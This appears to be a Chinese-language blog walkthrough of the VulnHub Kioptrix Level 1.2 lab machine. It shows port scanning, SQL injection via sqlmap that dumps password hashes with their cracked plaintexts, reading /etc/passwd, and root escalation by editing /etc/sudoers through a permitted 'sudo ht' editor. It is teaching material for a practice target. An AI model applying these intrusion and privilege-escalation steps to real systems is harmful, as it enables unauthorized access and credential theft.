VulnHub Kioptrix: Level 1.2 (#3) 靶机过程

  • by
Name: Kioptrix: Level 1.2 (#3)
Date release: 18 Apr 2011
Host: kioptrix3.com
IP: 192.168.50.34

信息收集

端口

root@kali:~# nmap kioptrix3.com -p- --open
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-17 09:18 HKT
Nmap scan report for kioptrix3.com (192.168.50.34)
Host is up (0.00085s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:E2:F0:0A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.76 seconds

Web程序

  • Gallarific
  • LotusCMS
  • phpMyAdmin 2.11.3

Web程序漏洞

  • Gallarific
    • gallery.php SQL Injection
  • LotusCMS
    • RCE
    • Code Inject

物理路径

现在已经获得www-data权限,以及数据库的访问权,经过一番尝试后发现不能像以前那样利用Linux内核漏洞进行提权,试了很多个Exp都失败,只好在已有的条件下找方法。

提权

获得系统用户loneferret和dreg

meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

lastlog命令可以看到 loneferret 用户登录过系统

lastlog
Username         Port     From             Latest
root             tty1                      Mon Apr 18 11:29:13 -0400 2011
...
loneferret       pts/0    3llxkxs-mbp      Thu Jan 16 09:38:36 -0500 2020
dreg                                       **Never logged in**

查看loneferret目录发现CompanyPolicy.README和checksec.sh,都是root权限的文件

ls /home/loneferret -lsa
total 68
 4 drwxr-xr-x 3 loneferret loneferret  4096 Jan 16 09:22 .
 4 drwxr-xr-x 5 root       root        4096 Apr 16  2011 ..
 4 -rw-r--r-- 1 loneferret users        497 Jan 16 10:37 .bash_history
 4 -rw-r--r-- 1 loneferret loneferret   220 Apr 11  2011 .bash_logout
 4 -rw-r--r-- 1 loneferret loneferret  2940 Apr 11  2011 .bashrc
 4 -rw-r--r-- 1 loneferret root        1678 Jan 16 09:25 .htcfg2
 4 -rw------- 1 root       root          15 Apr 15  2011 .nano_history
 4 -rw-r--r-- 1 loneferret loneferret   586 Apr 11  2011 .profile
 4 drwx------ 2 loneferret loneferret  4096 Apr 14  2011 .ssh
 0 -rw-r--r-- 1 loneferret loneferret     0 Apr 11  2011 .sudo_as_admin_successful
 4 -rw-r--r-- 1 root       root         224 Apr 16  2011 CompanyPolicy.README
28 -rwxrwxr-x 1 root       root       26275 Jan 12  2011 checksec.sh

CompanyPolicy.README是说明文件,告诉新人如何使用sudo ht来编辑和查看文件,既然loneferret可以使用sudo,那么现在获取loneferret用户的密码登录SSH就可以获取root权限了

cat /home/loneferret/CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO

通过sqlmap dump出gallery.dev_accounts存放了两个系统用户的密码

Database: gallery
Table: dev_accounts
[2 entries]
+----+---------------------------------------------+------------+
| id | password                                    | username   |
+----+---------------------------------------------+------------+
| 1  | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   | dreg       |
| 2  | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+

loneferret登录成功

sudo cat 没有权限,试试前面文档写的ht可以成功编辑/etc/sudoers

loneferret@Kioptrix3:~$ sudo cat /etc/sudoers
[sudo] password for loneferret:
Sorry, user loneferret is not allowed to execute '/bin/cat /etc/sudoers' as root on Kioptrix3.
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers
loneferret@Kioptrix3:~$ which su
/bin/su

可以看到不允许使用su命令

使用ht将!/usr/bin/su修改成/bin/su即可,这里换成了空格符20

保存后执行sudo su – 成功获取root权限。

总结

看着顺畅,实际上走了很多弯路,比如sqlmap没看 gallery.dev_accounts ,而是gallery.gallarific_users 得到dreg用户密码,登录后连sudo权限都没有。

发表评论

电子邮件地址不会被公开。 必填项已用*标注